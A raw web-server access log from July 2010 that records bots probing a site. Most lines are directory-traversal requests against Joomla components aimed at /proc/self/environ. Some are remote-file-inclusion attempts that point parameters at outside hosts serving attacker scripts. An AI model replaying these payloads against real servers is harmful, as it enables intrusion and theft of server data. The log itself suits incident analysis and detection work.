188.72.70.56 - - [27/Jul/2010:11:13:47 +0200] "GET /logs/access_log////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 345 "-" "Mozilla/5.0"
188.72.70.56 - - [27/Jul/2010:11:14:33 +0200] "GET /logs/access_log////skin/ggambo7002_board/comment_modify.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 345 "-" "Mozilla/5.0"
67.227.197.25 - - [27/Jul/2010:11:22:34 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:34 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:36 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:36 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:41 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:42 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
94.23.215.207 - - [27/Jul/2010:11:22:42 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:42 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:42 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:42 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:22:42 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
67.227.197.25 - - [27/Jul/2010:11:22:42 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:42 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:42 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
94.23.215.207 - - [27/Jul/2010:11:22:42 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
67.227.197.25 - - [27/Jul/2010:11:22:42 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:43 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:43 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:45 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.833"
67.227.197.25 - - [27/Jul/2010:11:22:45 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.833"
83.149.110.213 - - [27/Jul/2010:11:23:30 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:11:23:31 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:11:23:36 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:23:37 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
83.149.110.213 - - [27/Jul/2010:11:23:43 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:11:23:43 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:11:23:48 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:23:48 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
83.149.110.213 - - [27/Jul/2010:11:23:59 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:11:23:59 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:11:24:07 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:24:07 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:24:12 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:24:12 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
83.149.110.213 - - [27/Jul/2010:11:24:13 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
83.149.110.213 - - [27/Jul/2010:11:24:14 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
92.43.201.28 - - [27/Jul/2010:11:24:27 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:24:27 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:26:51 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:26:51 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:27:54 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
92.43.201.28 - - [27/Jul/2010:11:27:54 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
94.23.215.207 - - [27/Jul/2010:11:28:41 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:41 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:53 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:28:53 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:04 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:11:29:04 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
76.242.100.234 - - [27/Jul/2010:11:31:23 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:31:23 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:31:30 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:32:13 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:32:13 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:32:46 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:32:46 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:33:16 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:33:21 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:33:27 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:33:27 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:38:22 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:38:23 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:38:49 +0200] "GET /logs//index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
76.242.100.234 - - [27/Jul/2010:11:38:49 +0200] "GET //index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
188.165.217.175 - - [27/Jul/2010:11:40:14 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:11:40:14 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:17 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:17 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:18 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
91.121.141.186 - - [27/Jul/2010:11:40:18 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:11:40:24 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:40:24 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:40:50 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:11:40:51 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.808"
188.165.217.175 - - [27/Jul/2010:11:41:10 +0200] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
188.165.217.175 - - [27/Jul/2010:11:41:10 +0200] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:00:52 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:00:52 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:00:54 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:00:54 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:01:07 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:01:07 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
92.241.190.214 - - [27/Jul/2010:12:10:43 +0200] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 329 "-" "libwww-perl/5.805"
92.241.190.214 - - [27/Jul/2010:12:11:08 +0200] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 329 "-" "libwww-perl/5.805"
67.195.114.225 - - [27/Jul/2010:12:22:24 +0200] "GET /robots.txt HTTP/1.0" 404 296 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.225 - - [27/Jul/2010:12:22:24 +0200] "GET /?C=N;O=D HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.215.207 - - [27/Jul/2010:12:57:55 +0200] "GET /logs/access_log/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:57:56 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:57:56 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:58:12 +0200] "GET /logs/access_log/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:58:12 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:58:13 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:58:25 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:12:58:25 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
193.138.125.55 - - [27/Jul/2010:13:02:20 +0200] "GET /logs/access_log/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:02:20 +0200] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
193.138.125.55 - - [27/Jul/2010:13:02:20 +0200] "GET /logs/index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
76.70.7.48 - - [27/Jul/2010:13:32:47 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
82.141.136.11 - - [27/Jul/2010:13:37:23 +0200] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 339 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.141.136.11 - - [27/Jul/2010:13:37:24 +0200] "GET /logs/error_log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.141.136.11 - - [27/Jul/2010:13:37:24 +0200] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
82.141.136.11 - - [27/Jul/2010:13:38:17 +0200] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
82.141.136.11 - - [27/Jul/2010:13:38:17 +0200] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 339 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
82.141.136.11 - - [27/Jul/2010:13:38:17 +0200] "GET /logs/error_log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://msd.org.mk/plugins/id.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.121.240.147 - - [27/Jul/2010:13:45:08 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
76.70.7.48 - - [27/Jul/2010:13:48:25 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.79"
